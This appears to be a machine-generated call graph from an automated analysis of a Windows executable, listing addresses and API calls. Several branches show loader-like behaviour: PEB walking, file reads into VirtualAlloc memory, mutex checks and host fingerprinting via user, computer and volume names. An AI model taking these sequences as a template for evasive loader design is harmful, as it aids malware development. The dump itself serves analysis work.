109652 404c03 2 API calls 109652->109649 109699 425270 109653->109699 109655 404dfc 109655->109445 109655->109446 109780 404c36 109656->109780 109659 404c36 2 API calls 109662 404b8f 109659->109662 109660 404ba1 FreeLibrary 109661 404baa 109660->109661 109663 404c70 109661->109663 109662->109660 109662->109661 109664 420db6 Mailbox 59 API calls 109663->109664 109665 404c85 109664->109665 109784 40522e 109665->109784 109667 404c91 _memmove 109668 404ccc 109667->109668 109669 404dc1 109667->109669 109670 404d89 109667->109670 109671 404ec7 69 API calls 109668->109671 109798 46991b 95 API calls 109669->109798 109787 404e89 CreateStreamOnHGlobal 109670->109787 109679 404cd5 109671->109679 109674 404f0b 74 API calls 109674->109679 109675 404d69 109675->109453 109677 43d8a7 109678 404ee5 85 API calls 109677->109678 109680 43d8bb 109678->109680 109679->109674 109679->109675 109679->109677 109793 404ee5 109679->109793 109681 404f0b 74 API calls 109680->109681 109681->109675 109683 404f1d 109682->109683 109684 43d9cd 109682->109684 109822 4255e2 109683->109822 109687 469109 109954 468f5f 109687->109954 109689 46911f 109689->109461 109691 43d990 109690->109691 109692 404ed6 109690->109692 109959 425c60 109692->109959 109694 404ede 109696 404bd0 109695->109696 109697 404c0c LoadLibraryA 109695->109697 109696->109649 109696->109652 109697->109696 109698 404c1d GetProcAddress 109697->109698 109698->109696 109701 42527c __wfsopen 109699->109701 109700 42528f 109748 428b28 58 API calls __getptd_noexit 109700->109748 109701->109700 109703 4252c0 109701->109703 109718 4304e8 109703->109718 109704 425294 109749 428db6 9 API calls __wfsopen 109704->109749 109707 4252c5 109708 4252db 109707->109708 109709 4252ce 109707->109709 109711 425305 109708->109711 109712 4252e5 109708->109712 109750 428b28 58 API calls __getptd_noexit 109709->109750 109733 430607 109711->109733 109751 428b28 58 API calls __getptd_noexit 109712->109751 109713 42529f __wfsopen @_EH4_CallFilterFunc@8 109713->109655 109719 4304f4 __wfsopen 109718->109719 109720 429c0b __lock 58 API calls 109719->109720 109730 430502 109720->109730 109721 430576 109753 4305fe 109721->109753 109722 43057d 109758 42881d 58 API calls 2 library calls 109722->109758 109725 4305f3 __wfsopen 109725->109707 109726 430584 109726->109721 109759 429e2b InitializeCriticalSectionAndSpinCount 109726->109759 109729 429c93 __mtinitlocknum 58 API calls 109729->109730 109730->109721 109730->109722 109730->109729 109756 426c50 59 API calls __lock 109730->109756 109757 426cba LeaveCriticalSection LeaveCriticalSection _doexit 109730->109757 109731 4305aa EnterCriticalSection 109731->109721 109734 430627 __wopenfile 109733->109734 109735 430641 109734->109735 109747 4307fc 109734->109747 109766 4237cb 60 API calls 2 library calls 109734->109766 109764 428b28 58 API calls __getptd_noexit 109735->109764 109737 430646 109765 428db6 9 API calls __wfsopen 109737->109765 109739 43085f 109761 4385a1 109739->109761 109740 425310 109752 425332 LeaveCriticalSection LeaveCriticalSection _fseek 109740->109752 109743 4307f5 109743->109747 109767 4237cb 60 API calls 2 library calls 109743->109767 109745 430814 109745->109747 109768 4237cb 60 API calls 2 library calls 109745->109768 109747->109735 109747->109739 109748->109704 109749->109713 109750->109713 109751->109713 109752->109713 109760 429d75 LeaveCriticalSection 109753->109760 109755 430605 109755->109725 109756->109730 109757->109730 109758->109726 109759->109731 109760->109755 109769 437d85 109761->109769 109763 4385ba 109763->109740 109764->109737 109765->109740 109766->109743 109767->109745 109768->109747 109772 437d91 __wfsopen 109769->109772 109770 437da7 109771 428b28 __wfsopen 58 API calls 109770->109771 109773 437dac 109771->109773 109772->109770 109774 437ddd 109772->109774 109775 428db6 __wfsopen 9 API calls 109773->109775 109776 437e4e __wsopen_nolock 109 API calls 109774->109776 109779 437db6 __wfsopen 109775->109779 109777 437df9 109776->109777 109778 437e22 __wsopen_helper LeaveCriticalSection 109777->109778 109778->109779 109779->109763 109781 404b83 109780->109781 109782 404c3f LoadLibraryA 109780->109782 109781->109659 109781->109662 109782->109781 109783 404c50 GetProcAddress 109782->109783 109783->109781 109785 420db6 Mailbox 59 API calls 109784->109785 109786 405240 109785->109786 109786->109667 109788 404ec0 109787->109788 109789 404ea3 FindResourceExW 109787->109789 109788->109668 109789->109788 109790 43d933 LoadResource 109789->109790 109790->109788 109791 43d948 SizeofResource 109790->109791 109791->109788 109792 43d95c LockResource 109791->109792 109792->109788 109794 404ef4 109793->109794 109795 43d9ab 109793->109795 109799 42584d 109794->109799 109797 404f02 109797->109679 109798->109668 109803 425859 __wfsopen 109799->109803 109800 42586b 109812 428b28 58 API calls __getptd_noexit 109800->109812 109802 425891 109814 426c11 109802->109814 109803->109800 109803->109802 109804 425870 109813 428db6 9 API calls __wfsopen 109804->109813 109809 4258a6 109821 4258c8 LeaveCriticalSection LeaveCriticalSection _fseek 109809->109821 109811 42587b __wfsopen 109811->109797 109812->109804 109813->109811 109815 426c43 EnterCriticalSection 109814->109815 109816 426c21 109814->109816 109819 425897 109815->109819 109816->109815 109817 426c29 109816->109817 109818 429c0b __lock 58 API calls 109817->109818 109818->109819 109820 4257be 83 API calls 5 library calls 109819->109820 109820->109809 109821->109811 109825 4255fd 109822->109825 109824 404f2e 109824->109687 109826 425609 __wfsopen 109825->109826 109827 42564c 109826->109827 109828 425644 __wfsopen 109826->109828 109831 42561f _memset 109826->109831 109829 426c11 __lock_file 59 API calls 109827->109829 109828->109824 109830 425652 109829->109830 109838 42541d 109830->109838 109852 428b28 58 API calls __getptd_noexit 109831->109852 109834 425639 109853 428db6 9 API calls __wfsopen 109834->109853 109842 425438 _memset 109838->109842 109845 425453 109838->109845 109839 425443 109950 428b28 58 API calls __getptd_noexit 109839->109950 109841 425448 109951 428db6 9 API calls __wfsopen 109841->109951 109842->109839 109842->109845 109849 425493 109842->109849 109854 425686 LeaveCriticalSection LeaveCriticalSection _fseek 109845->109854 109846 4255a4 _memset 109953 428b28 58 API calls __getptd_noexit 109846->109953 109849->109845 109849->109846 109855 4246e6 109849->109855 109862 430e5b 109849->109862 109930 430ba7 109849->109930 109952 430cc8 58 API calls 3 library calls 109849->109952 109852->109834 109853->109828 109854->109828 109856 4246f0 109855->109856 109857 424705 109855->109857 109858 428b28 __wfsopen 58 API calls 109856->109858 109857->109849 109859 4246f5 109858->109859 109860 428db6 __wfsopen 9 API calls 109859->109860 109861 424700 109860->109861 109861->109849 109863 430e93 109862->109863 109864 430e7c 109862->109864 109866 4315cb 109863->109866 109871 430ecd 109863->109871 109865 428af4 __write 58 API calls 109864->109865 109868 430e81 109865->109868 109867 428af4 __write 58 API calls 109866->109867 109869 4315d0 109867->109869 109870 428b28 __wfsopen 58 API calls 109868->109870 109873 428b28 __wfsopen 58 API calls 109869->109873 109910 430e88 109870->109910 109872 430ed5 109871->109872 109879 430eec 109871->109879 109874 428af4 __write 58 API calls 109872->109874 109875 430ee1 109873->109875 109876 430eda 109874->109876 109877 428db6 __wfsopen 9 API calls 109875->109877 109880 428b28 __wfsopen 58 API calls 109876->109880 109877->109910 109878 430f01 109881 428af4 __write 58 API calls 109878->109881 109879->109878 109882 430f1b 109879->109882 109883 430f39 109879->109883 109879->109910 109880->109875 109881->109876 109882->109878 109885 430f26 109882->109885 109884 42881d __malloc_crt 58 API calls 109883->109884 109886 430f49 109884->109886 109887 435c6b __flsbuf 58 API calls 109885->109887 109888 430f51 109886->109888 109889 430f6c 109886->109889 109890 43103a 109887->109890 109891 428b28 __wfsopen 58 API calls 109888->109891 109893 4318c1 __lseeki64_nolock 60 API calls 109889->109893 109892 4310b3 ReadFile 109890->109892 109897 431050 GetConsoleMode 109890->109897 109894 430f56 109891->109894 109895 431593 GetLastError 109892->109895 109896 4310d5 109892->109896 109893->109885 109898 428af4 __write 58 API calls 109894->109898 109899 4315a0 109895->109899 109900 431093 109895->109900 109896->109895 109904 4310a5 109896->109904 109901 4310b0 109897->109901 109902 431064 109897->109902 109898->109910 109903 428b28 __wfsopen 58 API calls 109899->109903 109907 428b07 __dosmaperr 58 API calls 109900->109907 109917 431099 109900->109917 109901->109892 109902->109901 109905 43106a ReadConsoleW 109902->109905 109908 4315a5 109903->109908 109913 43110a 109904->109913 109914 431377 109904->109914 109904->109917 109905->109904 109906 43108d GetLastError 109905->109906 109906->109900 109907->109917 109909 428af4 __write 58 API calls 109908->109909 109909->109917 109910->109849 109911 422d55 _free 58 API calls 109911->109910 109912 4311f7 109912->109917 109920 4312b4 109912->109920 109921 4312a4 109912->109921 109926 431264 MultiByteToWideChar 109912->109926 109913->109912 109916 431176 ReadFile 109913->109916 109914->109917 109918 43147d ReadFile 109914->109918 109919 431197 GetLastError 109916->109919 109929 4311a1 109916->109929 109917->109910 109917->109911 109922 4314a0 GetLastError 109918->109922 109927 4314ae 109918->109927 109919->109929 109924 4318c1 __lseeki64_nolock 60 API calls 109920->109924 109920->109926 109923 428b28 __wfsopen 58 API calls 109921->109923 109922->109927 109923->109917 109924->109926 109925 4318c1 __lseeki64_nolock 60 API calls 109925->109929 109926->109906 109926->109917 109927->109914 109928 4318c1 __lseeki64_nolock 60 API calls 109927->109928 109928->109927 109929->109913 109929->109925 109931 430bb2 109930->109931 109934 430bc7 109930->109934 109932 428b28 __wfsopen 58 API calls 109931->109932 109933 430bb7 109932->109933 109935 428db6 __wfsopen 9 API calls 109933->109935 109936 430bfc 109934->109936 109937 435fe4 __getbuf 58 API calls 109934->109937 109941 430bc2 109934->109941 109935->109941 109938 4246e6 __flsbuf 58 API calls 109936->109938 109937->109936 109939 430c10 109938->109939 109940 430d47 __read 72 API calls 109939->109940 109942 430c17 109940->109942 109941->109849 109942->109941 109943 4246e6 __flsbuf 58 API calls 109942->109943 109944 430c3a 109943->109944 109944->109941 109945 4246e6 __flsbuf 58 API calls 109944->109945 109946 430c46 109945->109946 109946->109941 109947 4246e6 __flsbuf 58 API calls 109946->109947 109948 430c53 109947->109948 109949 4246e6 __flsbuf 58 API calls 109948->109949 109949->109941 109950->109841 109951->109845 109952->109849 109953->109841 109957 42520a GetSystemTimeAsFileTime 109954->109957 109956 468f6e 109956->109689 109958 425238 __aulldiv 109957->109958 109958->109956 109960 425c6c __wfsopen 109959->109960 109961 425c93 109960->109961 109962 425c7e 109960->109962 109964 426c11 __lock_file 59 API calls 109961->109964 109973 428b28 58 API calls __getptd_noexit 109962->109973 109966 425c99 109964->109966 109965 425c83 109974 428db6 9 API calls __wfsopen 109965->109974 109975 4258d0 67 API calls 6 library calls 109966->109975 109969 425ca4 109976 425cc4 LeaveCriticalSection LeaveCriticalSection _fseek 109969->109976 109971 425cb6 109972 425c8e __wfsopen 109971->109972 109972->109694 109973->109965 109974->109972 109975->109969 109976->109971 110354 407c5f __wsetenvp 110353->110354 110355 408029 59 API calls 110354->110355 110356 407c70 _memmove 110354->110356 110357 43ed07 _memmove 110355->110357 110356->109642 110358->109212 110359->109194 110360->109208 110361->109204 110362->109221 110363->109222 110364->108960 110365->108956 110366->108842 110367->108842 110368->108845 110369->108844 110370->108836 110371->108844 110372->108871 110373 401066 110378 40f76f 110373->110378 110375 40106c 110376 422d40 __cinit 67 API calls 110375->110376 110377 401076 110376->110377 110379 40f790 110378->110379 110411 41ff03 110379->110411 110383 40f7d7 110384 407667 59 API calls 110383->110384 110385 40f7e1 110384->110385 110386 407667 59 API calls 110385->110386 110387 40f7eb 110386->110387 110388 407667 59 API calls 110387->110388 110389 40f7f5 110388->110389 110390 407667 59 API calls 110389->110390 110391 40f833 110390->110391 110392 407667 59 API calls 110391->110392 110393 40f8fe 110392->110393 110421 415f87 110393->110421 110397 40f930 110398 407667 59 API calls 110397->110398 110399 40f93a 110398->110399 110449 41fd9e 110399->110449 110401 40f981 110402 40f991 GetStdHandle 110401->110402 110403 40f9dd 110402->110403 110404 4445ab 110402->110404 110405 40f9e5 OleInitialize 110403->110405 110404->110403 110406 4445b4 110404->110406 110405->110375 110456 466b38 64 API calls Mailbox 110406->110456 110408 4445bb 110457 467207 CreateThread 110408->110457 110410 4445c7 CloseHandle 110410->110405 110458 41ffdc 110411->110458 110414 41ffdc 59 API calls 110415 41ff45 110414->110415 110416 407667 59 API calls 110415->110416 110417 41ff51 110416->110417 110418 407bcc 59 API calls 110417->110418 110419 40f796 110418->110419 110420 420162 6 API calls 110419->110420 110420->110383 110422 407667 59 API calls 110421->110422 110423 415f97 110422->110423 110424 407667 59 API calls 110423->110424 110425 415f9f 110424->110425 110465 415a9d 110425->110465 110428 415a9d 59 API calls 110429 415faf 110428->110429 110430 407667 59 API calls 110429->110430 110431 415fba 110430->110431 110432 420db6 Mailbox 59 API calls 110431->110432 110433 40f908 110432->110433 110434 4160f9 110433->110434 110435 416107 110434->110435 110436 407667 59 API calls 110435->110436 110437 416112 110436->110437 110438 407667 59 API calls 110437->110438 110439 41611d 110438->110439 110440 407667 59 API calls 110439->110440 110441 416128 110440->110441 110442 407667 59 API calls 110441->110442 110443 416133 110442->110443 110444 415a9d 59 API calls 110443->110444 110445 41613e 110444->110445 110446 420db6 Mailbox 59 API calls 110445->110446 110447 416145 RegisterWindowMessageW 110446->110447 110447->110397 110450 45576f 110449->110450 110451 41fdae 110449->110451 110468 469ae7 60 API calls 110450->110468 110452 420db6 Mailbox 59 API calls 110451->110452 110454 41fdb6 110452->110454 110454->110401 110455 45577a 110456->110408 110457->110410 110469 4671ed 65 API calls 110457->110469 110459 407667 59 API calls 110458->110459 110460 41ffe7 110459->110460 110461 407667 59 API calls 110460->110461 110462 41ffef 110461->110462 110463 407667 59 API calls 110462->110463 110464 41ff3b 110463->110464 110464->110414 110466 407667 59 API calls 110465->110466 110467 415aa5 110466->110467 110467->110428 110468->110455 110470 40552a 110477 405ab8 110470->110477 110476 40555a Mailbox 110478 420db6 Mailbox 59 API calls 110477->110478 110479 405acb 110478->110479 110480 420db6 Mailbox 59 API calls 110479->110480 110481 40553c 110480->110481 110482 4054d2 110481->110482 110496 4058cf 110482->110496 110484 405514 110484->110476 110488 408061 MultiByteToWideChar 110484->110488 110486 4054e3 110486->110484 110503 405bc0 110486->110503 110509 405a7a 110486->110509 110489 408087 110488->110489 110490 4080ce 110488->110490 110491 420db6 Mailbox 59 API calls 110489->110491 110492 407d8c 59 API calls 110490->110492 110493 40809c MultiByteToWideChar 110491->110493 110495 4080c0 110492->110495 110526 40774d 59 API calls 2 library calls 110493->110526 110495->110476 110497 4058e0 110496->110497 110498 43dc3c 110496->110498 110497->110486 110518 455ecd 59 API calls Mailbox 110498->110518 110500 43dc46 110501 420db6 Mailbox 59 API calls 110500->110501 110502 43dc52 110501->110502 110504 405c33 110503->110504 110508 405bce 110503->110508 110519 405c4e SetFilePointerEx 110504->110519 110506 405bf6 110506->110486 110507 405c06 ReadFile 110507->110506 110507->110508 110508->110506 110508->110507 110510 43dcee 110509->110510 110511 405a8e 110509->110511 110525 455ecd 59 API calls Mailbox 110510->110525 110520 4059b9 110511->110520 110514 43dcf9 110516 420db6 Mailbox 59 API calls 110514->110516 110515 405a9a 110515->110486 110517 43dd0e _memmove 110516->110517 110518->110500 110519->110508 110521 4059d1 110520->110521 110524 4059ca _memmove 110520->110524 110522 43dc7e 110521->110522 110523 420db6 Mailbox 59 API calls 110521->110523 110523->110524 110524->110515 110525->110514 110526->110495 110527 c92963 110528 c92978 110527->110528 110536 c90008 110528->110536 110530 c92984 110531 c92a38 110530->110531 110532 c929a2 110530->110532 110552 c932e8 9 API calls 110531->110552 110539 c92648 110532->110539 110535 c92a1f 110553 c934f8 GetPEB 110536->110553 110538 c90693 110538->110530 110540 c90008 GetPEB 110539->110540 110549 c926e7 110540->110549 110542 c92718 CreateFileW 110545 c92725 110542->110545 110542->110549 110543 c92741 VirtualAlloc 110544 c92762 ReadFile 110543->110544 110543->110545 110544->110545 110546 c92780 VirtualAlloc 110544->110546 110547 c92942 110545->110547 110548 c92934 VirtualFree 110545->110548 110546->110545 110546->110549 110547->110535 110548->110547 110549->110543 110549->110545 110550 c92848 CloseHandle 110549->110550 110551 c92858 VirtualFree 110549->110551 110555 c93558 GetPEB 110549->110555 110550->110549 110551->110549 110552->110535 110554 c93522 110553->110554 110554->110538 110556 c93582 110555->110556 110556->110542 110557 ae5085 110558 ae506f 110557->110558 110559 ae5089 110557->110559 110562 b08550 110558->110562 110561 ae5078 110569 b08556 110562->110569 110563 b08145 GetLastError 110587 b07dd7 110563->110587 110564 b08579 FreeSid 110564->110569 110565 b08bc1 GetLastError 110565->110569 110566 b083fb GetUserNameW 110566->110587 110567 b08209 GetUserNameW 110584 b07d37 110567->110584 110567->110587 110568 b08986 SetEntriesInAclW 110568->110569 110569->110562 110569->110563 110569->110564 110569->110565 110569->110568 110570 b0890b LocalFree 110569->110570 110571 b089cd OpenMutexW 110569->110571 110577 b07d30 110569->110577 110578 b08599 110569->110578 110579 b07d20 110569->110579 110582 b0896a wsprintfW 110569->110582 110583 b08953 AllocateAndInitializeSid 110569->110583 110569->110584 110569->110587 110570->110569 110571->110561 110572 b08248 110574 b0824a GetLastError 110572->110574 110574->110561 110575 b0836e GetLastError 110575->110587 110576 b07d6c GetVolumeInformationW 110576->110561 110577->110576 110577->110584 110578->110577 110578->110582 110579->110576 110579->110577 110581 b07d83 GetWindowsDirectoryW 110579->110581 110579->110584 110585 b07e06 GetComputerNameW 110579->110585 110580 b07fd4 GetLastError 110580->110587 110581->110577 110581->110584 110582->110577 110583->110569 110584->110561 110585->110584 110586 b07f6b GetVolumeInformationW 110586->110587 110587->110563 110587->110566 110587->110567 110587->110572 110587->110574 110587->110575 110587->110576 110587->110577 110587->110579 110587->110580 110587->110584 110587->110586 110588 40e5ab 110591 40d100 110588->110591 110590 40e5b9 110592 40d37d 110591->110592 110593 40d11d 110591->110593 110605 40d54b 110592->110605 110640 469e4a 89 API calls 4 library calls 110592->110640 110594 4426e0 110593->110594 110595 442691 110593->110595 110600 40d144 110593->110600 110635 47a3e6 341 API calls __cinit 110594->110635 110596 442694 110595->110596 110606 4426af 110595->110606 110599 4426a0 110596->110599 110596->110600 110633 47a9fa 341 API calls 110599->110633 110600->110592 110603 422d40 __cinit 67 API calls 110600->110603 110600->110605 110611 4427fc 110600->110611 110615 4084c0 69 API calls 110600->110615 110616 40d434 110600->110616 110622 409ea0 341 API calls 110600->110622 110623 408047 59 API calls 110600->110623 110625 408740 68 API calls __cinit 110600->110625 110626 408542 68 API calls 110600->110626 110628 40843a 68 API calls 110600->110628 110629 40cf7c 341 API calls 110600->110629 110630 409dda 59 API calls Mailbox 110600->110630 110631 40cf00 89 API calls 110600->110631 110632 40cd7d 341 API calls 110600->110632 110636 408a52 68 API calls 110600->110636 110637 409d3c 60 API calls Mailbox 110600->110637 110638 45678d 60 API calls 110600->110638 110603->110600 110604 4428b5 110604->110604 110605->110590 110606->110592 110634 47aea2 341 API calls 3 library calls 110606->110634 110610 40d443 110610->110590 110639 47a751 89 API calls 110611->110639 110615->110600 110627 408a52 68 API calls 110616->110627 110622->110600 110623->110600 110625->110600 110626->110600 110627->110610 110628->110600 110629->110600 110630->110600 110631->110600 110632->110600 110633->110605 110634->110592 110635->110600 110636->110600 110637->110600 110638->110600 110639->110592 110640->110604 110641 40e48c 110644 40ccba 110641->110644 110643 40e498 110645 40ccd2 110644->110645 110646 40cd26 110644->110646 110645->110646 110647 409ea0 341 API calls 110645->110647 110651 40cd4f 110646->110651 110654 469e4a 89 API calls 4 library calls 110646->110654 110650 40cd09 110647->110650 110649 4425bc 110649->110649 110650->110651 110653 409d3c 60 API calls Mailbox 110650->110653 110651->110643 110653->110646 110654->110649 110655 ae7b22 110656 ae7b2b 110655->110656 110658 ae5f10 110655->110658 110657 ae6084 SetFilePointerEx 110657->110658 110658->110657 110659 ae5d90 110658->110659 110660 aeb180 110668 aeb0de 110660->110668 110661 aeb2a7 SetFilePointerEx 110663 aeb1df 110661->110663 110667 aeb1c6 110661->110667 110662 aeb196 110664 aeb3a6 110662->110664 110662->110667 110665 aeb328 SetFilePointerEx 110664->110665 110666 aeb3b2 110664->110666 110667->110663 110669 aeb2e0 WriteFile 110667->110669 110668->110660 110668->110661 110668->110662 110668->110665 110670 aeb253 110668->110670 110671 aeb0d0 SetFilePointerEx 110668->110671 110671->110668 110672 aeb054 110671->110672 110673 c923b8 110674 c90008 GetPEB 110673->110674 110675 c924c9 110674->110675 110687 c922a8 110675->110687 110688 c922b1 Sleep 110687->110688 110689 c922bf 110688->110689 110690 403633 110691 40366a 110690->110691 110692 4036e5 110691->110692 110693 4036e7 110691->110693 110694 403688 110691->110694 110695 4036ca DefWindowProcW 110692->110695 110696 4036ed 110693->110696 110697 43d0cc 110693->110697 110698 403695 110694->110698 110699 40374b PostQuitMessage 110694->110699 110700 4036d8 110695->110700 110701 4036f2 110696->110701 110702 403715 SetTimer RegisterWindowMessageW 110696->110702 110739 411070 10 API calls Mailbox 110697->110739 110704 4036a0 110698->110704 110705 43d154 110698->110705 110699->110700 110707 4036f9 KillTimer 110701->110707 110708 43d06f 110701->110708 110702->110700 110710 40373e CreatePopupMenu 110702->110710 110711 403755 110704->110711 110712 4036a8 110704->110712 110755 462527 71 API calls _memset 110705->110755 110735 40443a Shell_NotifyIconW _memset 110707->110735 110717 43d074 110708->110717 110718 43d0a8 MoveWindow 110708->110718 110709 43d0f3 110740 411093 341 API calls Mailbox 110709->110740 110710->110700 110737 4044a0 64 API calls _memset 110711->110737 110713 4036b3 110712->110713 110714 43d139 110712->110714 110721 4036be 110713->110721 110722 43d124 110713->110722 110714->110695 110754 457c36 59 API calls Mailbox 110714->110754 110715 43d166 110715->110695 110715->110700 110724 43d097 SetFocus 110717->110724 110725 43d078 110717->110725 110718->110700 110721->110695 110741 40443a Shell_NotifyIconW _memset 110721->110741 110753 462d36 81 API calls _memset 110722->110753 110723 403764 110723->110700 110724->110700 110725->110721 110727 43d081 110725->110727 110726 40370c 110736 403114 DeleteObject DestroyWindow Mailbox 110726->110736 110738 411070 10 API calls Mailbox 110727->110738 110733 43d118 110742 40434a 110733->110742 110735->110726 110736->110700 110737->110723 110738->110700 110739->110709 110740->110721 110741->110733 110743 404375 _memset 110742->110743 110756 404182 110743->110756 110746 4043fa 110748 404430 Shell_NotifyIconW 110746->110748 110749 404414 Shell_NotifyIconW 110746->110749 110750 404422 110748->110750 110749->110750 110760 40407c 110750->110760 110752 404429 110752->110692 110753->110723 110754->110692 110755->110715 110757 43d423 110756->110757 110758 404196 110756->110758 110757->110758 110759 43d42c DestroyIcon 110757->110759 110758->110746 110782 462f94 62 API calls _W_store_winword 110758->110782 110759->110758 110761 404098 110760->110761 110781 40416f Mailbox 110760->110781 110762 407a16 59 API calls 110761->110762 110763 4040a6 110762->110763 110764 4040b3 110763->110764 110765 43d3c8 LoadStringW 110763->110765 110766 407bcc 59 API calls 110764->110766 110768 43d3e2 110765->110768 110767 4040c8 110766->110767 110767->110768 110769 4040d9 110767->110769 110770 407b2e 59 API calls 110768->110770 110771 4040e3 110769->110771 110772 404174 110769->110772 110775 43d3ec 110770->110775 110774 407b2e 59 API calls 110771->110774 110773 408047 59 API calls 110772->110773 110778 4040ed _memset _wcscpy 110773->110778 110774->110778 110776 407cab 59 API calls 110775->110776 110775->110778 110777 43d40e 110776->110777 110780 407cab 59 API calls 110777->110780 110779 404155 Shell_NotifyIconW 110778->110779 110779->110781 110780->110778 110781->110752 110782->110746 110783 427c56 110784 427c62 __wfsopen 110783->110784 110818 428b7c GetProcessHeap 110784->110818 110786 427cbf 110787 427cca 110786->110787 110901 427da6 58 API calls 3 library calls 110786->110901 110819 429ae6 110787->110819 110790 427cd0 110791 427cdb __RTC_Initialize 110790->110791 110902 427da6 58 API calls 3 library calls 110790->110902 110840 42d5d2 110791->110840 110794 427cea 110795 427cf6 GetCommandLineW 110794->110795 110903 427da6 58 API calls 3 library calls 110794->110903 110859 434f23 GetEnvironmentStringsW 110795->110859 110798 427cf5 110798->110795 110801 427d10 110802 427d1b 110801->110802 110904 4230b5 58 API calls 3 library calls 110801->110904 110869 434d58 110802->110869 110805 427d21 110806 427d2c 110805->110806 110905 4230b5 58 API calls 3 library calls 110805->110905 110883 4230ef 110806->110883 110809 427d34 110810 427d3f __wwincmdln 110809->110810 110906 4230b5 58 API calls 3 library calls 110809->110906 110889 4047d0 110810->110889 110813 427d53 110814 427d62 110813->110814 110907 423358 58 API calls _doexit 110813->110907 110908 4230e0 58 API calls _doexit 110814->110908 110817 427d67 __wfsopen 110818->110786 110909 423187 36 API calls 2 library calls 110819->110909 110821 429aeb 110910 429d3c InitializeCriticalSectionAndSpinCount ___lock_fhandle 110821->110910 110823 429af0 110824 429af4 110823->110824 110912 429d8a TlsAlloc 110823->110912 110911 429b5c 61 API calls 2 library calls 110824->110911 110827 429af9 110827->110790 110828 429b06 110828->110824 110829 429b11 110828->110829 110913 4287d5 110829->110913 110832 429b53 110921 429b5c 61 API calls 2 library calls 110832->110921 110835 429b58 110835->110790 110836 429b32 110836->110832 110837 429b38 110836->110837 110920 429a33 58 API calls 4 library calls 110837->110920 110839 429b40 GetCurrentThreadId 110839->110790 110841 42d5de __wfsopen 110840->110841 110842 429c0b __lock 58 API calls 110841->110842 110843 42d5e5 110842->110843 110844 4287d5 __calloc_crt 58 API calls 110843->110844 110846 42d5f6 110844->110846 110845 42d601 __wfsopen @_EH4_CallFilterFunc@8 110845->110794 110846->110845 110847 42d661 GetStartupInfoW 110846->110847 110852 42d676 110847->110852 110854 42d7a5 110847->110854 110848 42d86d 110935 42d87d LeaveCriticalSection _doexit 110848->110935 110850 4287d5 __calloc_crt 58 API calls 110850->110852 110851 42d7f2 GetStdHandle 110851->110854 110852->110850 110852->110854 110855 42d6c4 110852->110855 110853 42d805 GetFileType 110853->110854 110854->110848 110854->110851 110854->110853 110934 429e2b InitializeCriticalSectionAndSpinCount 110854->110934 110855->110854 110856 42d6f8 GetFileType 110855->110856 110933 429e2b InitializeCriticalSectionAndSpinCount 110855->110933 110856->110855 110860 427d06 110859->110860 110862 434f34 110859->110862 110865 434b1b GetModuleFileNameW 110860->110865 110936 42881d 58 API calls 2 library calls 110862->110936 110863 434f5a _memmove 110864 434f70 FreeEnvironmentStringsW 110863->110864 110864->110860 110866 434b4f _wparse_cmdline 110865->110866 110868 434b8f _wparse_cmdline 110866->110868 110937 42881d 58 API calls 2 library calls 110866->110937 110868->110801 110870 434d71 __wsetenvp 110869->110870 110874 434d69 110869->110874 110871 4287d5 __calloc_crt 58 API calls 110870->110871 110879 434d9a __wsetenvp 110871->110879 110872 434df1 110873 422d55 _free 58 API calls 110872->110873 110873->110874 110874->110805 110875 4287d5 __calloc_crt 58 API calls 110875->110879 110876 434e16 110877 422d55 _free 58 API calls 110876->110877 110877->110874 110879->110872 110879->110874 110879->110875 110879->110876 110880 434e2d 110879->110880 110938 434607 58 API calls __wfsopen 110879->110938 110939 428dc6 IsProcessorFeaturePresent 110880->110939 110882 434e39 110882->110805 110884 4230fb __IsNonwritableInCurrentImage 110883->110884 110954 42a4d1 110884->110954 110886 423119 __initterm_e 110887 422d40 __cinit 67 API calls 110886->110887 110888 423138 _doexit __IsNonwritableInCurrentImage 110886->110888 110887->110888 110888->110809 110890 4047ea 110889->110890 110900 404889 110889->110900 110891 404824 IsThemeActive 110890->110891 110957 42336c 110891->110957 110895 404850 110969 4048fd SystemParametersInfoW SystemParametersInfoW 110895->110969 110897 40485c 110970 403b3a 110897->110970 110900->110813 110901->110787 110902->110791 110903->110798 110907->110814 110908->110817 110909->110821 110910->110823 110911->110827 110912->110828 110914 4287dc 110913->110914 110916 428817 110914->110916 110918 4287fa 110914->110918 110922 4351f6 110914->110922 110916->110832 110919 429de6 TlsSetValue 110916->110919 110918->110914 110918->110916 110930 42a132 Sleep 110918->110930 110919->110836 110920->110839 110921->110835 110923 435201 110922->110923 110928 43521c 110922->110928 110924 43520d 110923->110924 110923->110928 110931 428b28 58 API calls __getptd_noexit 110924->110931 110926 43522c HeapAlloc 110927 435212 110926->110927 110926->110928 110927->110914 110928->110926 110928->110927 110932 4233a1 DecodePointer 110928->110932 110930->110918 110931->110927 110932->110928 110933->110855 110934->110854 110935->110845 110936->110863 110937->110868 110938->110879 110940 428dd1 110939->110940 110945 428c59 110940->110945 110944 428dec 110944->110882 110946 428c73 _memset ___raise_securityfailure 110945->110946 110947 428c93 IsDebuggerPresent 110946->110947 110953 42a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 110947->110953 110949 42c5f6 __cftof_l 6 API calls 110951 428d7a 110949->110951 110950 428d57 ___raise_securityfailure 110950->110949 110952 42a140 GetCurrentProcess TerminateProcess 110951->110952 110952->110944 110953->110950 110955 42a4d4 EncodePointer 110954->110955 110955->110955 110956 42a4ee 110955->110956 110956->110886 110958 429c0b __lock 58 API calls 110957->110958 110959 423377 DecodePointer EncodePointer 110958->110959 111022 429d75 LeaveCriticalSection 110959->111022 110961 404849 110962 4233d4 110961->110962 110963 4233f8 110962->110963 110964 4233de 110962->110964 110963->110895 110964->110963 111023 428b28 58 API calls __getptd_noexit 110964->111023 110966 4233e8 111024 428db6 9 API calls __wfsopen 110966->111024 110968 4233f3 110968->110895 110969->110897 110971 403b47 __write_nolock 110970->110971 110972 407667 59 API calls 110971->110972 110973 403b51 GetCurrentDirectoryW 110972->110973 111025 403766 110973->111025 111022->110961 111023->110966 111024->110968 111026 407667 59 API calls 111025->111026 111027 40377c 111026->111027 111156 403d31 111027->111156 111029 40379a 111030 404706 61 API calls 111029->111030 111031 4037ae 111030->111031 111032 407de1 59 API calls 111031->111032 111033 4037bb 111032->111033 111034 404ddd 136 API calls 111033->111034 111035 4037d4 111034->111035 111036 43d173 111035->111036 111037 4037dc Mailbox 111035->111037 111198 46955b 111036->111198 111040 408047 59 API calls 111037->111040 111043 4037ef 111040->111043 111041 43d192 111042 422d55 _free 58 API calls 111041->111042 111045 43d19f 111042->111045 111170 40928a 111043->111170 111044 404e4a 84 API 